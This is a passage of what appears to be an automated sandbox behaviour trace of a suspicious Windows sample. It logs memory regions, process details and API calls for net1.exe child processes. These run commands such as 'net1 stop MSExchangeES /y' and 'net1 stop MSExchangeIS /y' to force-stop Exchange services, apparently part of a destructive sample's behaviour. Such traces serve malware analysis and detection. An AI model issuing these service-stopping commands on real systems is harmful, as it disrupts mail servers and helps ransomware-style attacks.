"private_0x000000007efe0000" filename = "" Region: id = 6878 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6879 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6880 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6881 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6882 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6883 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6884 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 6885 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6886 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 590 os_tid = 0x77c Process: id = "161" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x57eb7000" os_pid = "0x1278" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "152" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeES /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6994 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6995 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6996 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6997 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6998 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6999 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7000 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7001 start_va = 0xff190000 end_va = 0xff1c2fff entry_point = 0xff190000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7002 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7003 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7004 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7005 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7006 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7007 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7008 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7009 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7010 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7011 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7012 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7013 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 7014 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7015 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7016 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7017 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7018 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7019 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7020 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7021 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7022 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7023 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7024 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7025 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7026 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7027 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7028 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7029 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7030 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7031 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7073 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 597 os_tid = 0x12a0 [0101.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fc50 | out: lpSystemTimeAsFileTime=0x24fc50*(dwLowDateTime=0xf1b259d0, dwHighDateTime=0x1d48689)) [0101.544] GetCurrentProcessId () returned 0x1278 [0101.544] GetCurrentThreadId () returned 0x12a0 [0101.544] GetTickCount () returned 0x23294 [0101.544] QueryPerformanceCounter (in: lpPerformanceCount=0x24fc58 | out: lpPerformanceCount=0x24fc58*=1814846200000) returned 1 [0101.546] GetModuleHandleW (lpModuleName=0x0) returned 0xff190000 [0101.546] __set_app_type (_Type=0x1) [0101.546] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1a9c9c) returned 0x0 [0101.546] __getmainargs (in: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788, _DoWildCard=0, _StartInfo=0xff1b479c | out: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788) returned 0 [0101.546] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.546] GetConsoleOutputCP () returned 0x1b5 [0101.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1bcec0 | out: lpCPInfo=0xff1bcec0) returned 1 [0101.673] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.675] sprintf_s (in: _DstBuf=0x24fbf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0101.675] setlocale (category=0, locale=".437") returned="English_United States.437" [0101.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0101.677] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0101.677] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeES /y" [0101.677] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f990, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0101.677] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0101.677] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fbe8 | out: Buffer=0x24fbe8*=0x324d50) returned 0x0 [0101.677] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fbe8 | out: Buffer=0x24fbe8*=0x32c100) returned 0x0 [0101.677] _fileno (_File=0x7fefdba2a80) returned 0 [0101.677] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0101.677] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0101.677] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0101.677] _wcsicmp (_String1="config", _String2="stop") returned -16 [0101.677] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0101.677] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0101.677] _wcsicmp (_String1="file", _String2="stop") returned -13 [0101.677] _wcsicmp (_String1="files", _String2="stop") returned -13 [0101.677] _wcsicmp (_String1="group", _String2="stop") returned -12 [0101.677] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0101.677] _wcsicmp (_String1="help", _String2="stop") returned -11 [0101.678] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0101.678] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0101.678] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0101.678] _wcsicmp (_String1="session", _String2="stop") returned -15 [0101.678] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0101.678] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0101.678] _wcsicmp (_String1="share", _String2="stop") returned -12 [0101.678] _wcsicmp (_String1="start", _String2="stop") returned -14 [0101.678] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0101.678] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0101.678] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0101.678] _wcsicmp (_String1="accounts", _String2="MSExchangeES") returned -12 [0101.678] _wcsicmp (_String1="computer", _String2="MSExchangeES") returned -10 [0101.678] _wcsicmp (_String1="config", _String2="MSExchangeES") returned -10 [0101.678] _wcsicmp (_String1="continue", _String2="MSExchangeES") returned -10 [0101.678] _wcsicmp (_String1="cont", _String2="MSExchangeES") returned -10 [0101.678] _wcsicmp (_String1="file", _String2="MSExchangeES") returned -7 [0101.678] _wcsicmp (_String1="files", _String2="MSExchangeES") returned -7 [0101.678] _wcsicmp (_String1="group", _String2="MSExchangeES") returned -6 [0101.678] _wcsicmp (_String1="groups", _String2="MSExchangeES") returned -6 [0101.678] _wcsicmp (_String1="help", _String2="MSExchangeES") returned -5 [0101.678] _wcsicmp (_String1="helpmsg", _String2="MSExchangeES") returned -5 [0101.678] _wcsicmp (_String1="localgroup", _String2="MSExchangeES") returned -1 [0101.678] _wcsicmp (_String1="pause", _String2="MSExchangeES") returned 3 [0101.678] _wcsicmp (_String1="session", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="sessions", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="sess", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="share", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="start", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="stats", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="statistics", _String2="MSExchangeES") returned 6 [0101.678] _wcsicmp (_String1="stop", _String2="MSExchangeES") returned 6 [0101.679] _wcsicmp (_String1="time", _String2="MSExchangeES") returned 7 [0101.679] _wcsicmp (_String1="user", _String2="MSExchangeES") returned 8 [0101.679] _wcsicmp (_String1="users", _String2="MSExchangeES") returned 8 [0101.679] _wcsicmp (_String1="msg", _String2="MSExchangeES") returned 2 [0101.679] _wcsicmp (_String1="messenger", _String2="MSExchangeES") returned -14 [0101.679] _wcsicmp (_String1="receiver", _String2="MSExchangeES") returned 5 [0101.679] _wcsicmp (_String1="rcv", _String2="MSExchangeES") returned 5 [0101.679] _wcsicmp (_String1="netpopup", _String2="MSExchangeES") returned 1 [0101.679] _wcsicmp (_String1="redirector", _String2="MSExchangeES") returned 5 [0101.679] _wcsicmp (_String1="redir", _String2="MSExchangeES") returned 5 [0101.679] _wcsicmp (_String1="rdr", _String2="MSExchangeES") returned 5 [0101.679] _wcsicmp (_String1="workstation", _String2="MSExchangeES") returned 10 [0101.679] _wcsicmp (_String1="work", _String2="MSExchangeES") returned 10 [0101.679] _wcsicmp (_String1="wksta", _String2="MSExchangeES") returned 10 [0101.679] _wcsicmp (_String1="prdr", _String2="MSExchangeES") returned 3 [0101.679] _wcsicmp (_String1="devrdr", _String2="MSExchangeES") returned -9 [0101.679] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeES") returned -1 [0101.679] _wcsicmp (_String1="server", _String2="MSExchangeES") returned 6 [0101.679] _wcsicmp (_String1="svr", _String2="MSExchangeES") returned 6 [0101.679] _wcsicmp (_String1="srv", _String2="MSExchangeES") returned 6 [0101.679] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeES") returned -1 [0101.679] _wcsicmp (_String1="alerter", _String2="MSExchangeES") returned -12 [0101.679] _wcsicmp (_String1="netlogon", _String2="MSExchangeES") returned 1 [0101.679] _wcsupr (in: _String="MSExchangeES" | out: _String="MSEXCHANGEES") returned="MSEXCHANGEES" [0101.680] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x32ce10 [0101.683] GetServiceKeyNameW (in: hSCManager=0x32ce10, lpDisplayName="MSEXCHANGEES", lpServiceName=0xff1b5750, lpcchBuffer=0x24fb08 | out: lpServiceName="", lpcchBuffer=0x24fb08) returned 0 [0101.684] _wcsicmp (_String1="msg", _String2="MSEXCHANGEES") returned 2 [0101.684] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEES") returned -14 [0101.684] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEES") returned 5 [0101.684] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEES") returned 5 [0101.685] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEES") returned 5 [0101.685] _wcsicmp (_String1="redir", _String2="MSEXCHANGEES") returned 5 [0101.685] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEES") returned 5 [0101.685] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEES") returned 10 [0101.685] _wcsicmp (_String1="work", _String2="MSEXCHANGEES") returned 10 [0101.685] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEES") returned 10 [0101.685] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEES") returned 3 [0101.685] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEES") returned -9 [0101.685] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEES") returned -1 [0101.685] _wcsicmp (_String1="server", _String2="MSEXCHANGEES") returned 6 [0101.685] _wcsicmp (_String1="svr", _String2="MSEXCHANGEES") returned 6 [0101.685] _wcsicmp (_String1="srv", _String2="MSEXCHANGEES") returned 6 [0101.685] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEES") returned -1 [0101.685] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEES") returned -12 [0101.685] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEES") returned 1 [0101.685] NetServiceControl (in: servername=0x0, service="MSEXCHANGEES", opcode=0x0, arg=0x0, bufptr=0x24fb10 | out: bufptr=0x24fb10) returned 0x889 [0101.686] wcscpy_s (in: _Destination=0xff1b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0101.686] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0101.687] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0101.688] GetFileType (hFile=0xb) returned 0x2 [0101.688] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9d8 | out: lpMode=0x24f9d8) returned 1 [0101.688] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f9d0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x24f9d0*=0x1e) returned 1 [0101.689] GetFileType (hFile=0xb) returned 0x2 [0101.689] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9d8 | out: lpMode=0x24f9d8) returned 1 [0101.689] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f9d0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x24f9d0*=0x2) returned 1 [0101.689] _ultow (in: _Dest=0x889, _Radix=2423360 | out: _Dest=0x889) returned="2185" [0101.689] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0101.690] GetFileType (hFile=0xb) returned 0x2 [0101.690] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9d8 | out: lpMode=0x24f9d8) returned 1 [0101.690] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f9d0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x24f9d0*=0x34) returned 1 [0101.690] GetFileType (hFile=0xb) returned 0x2 [0101.691] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9d8 | out: lpMode=0x24f9d8) returned 1 [0101.691] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f9d0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x24f9d0*=0x2) returned 1 [0101.691] NetApiBufferFree (Buffer=0x324d50) returned 0x0 [0101.691] NetApiBufferFree (Buffer=0x32c100) returned 0x0 [0101.691] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeES /y" [0101.691] exit (_Code=2) Process: id = "162" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x582b4000" os_pid = "0x130c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "153" os_parent_pid = "0x11d0" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeIS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6888 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6889 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6890 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6891 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6892 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6893 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6894 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6895 start_va = 0xff190000 end_va = 0xff1c2fff entry_point = 0xff190000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6896 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6897 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6898 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6899 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6900 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 6901 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6902 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6903 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6904 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6905 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6906 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 6907 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6908 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6909 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6910 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6911 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6912 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6913 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6914 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6915 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6916 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6917 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6918 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6919 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff 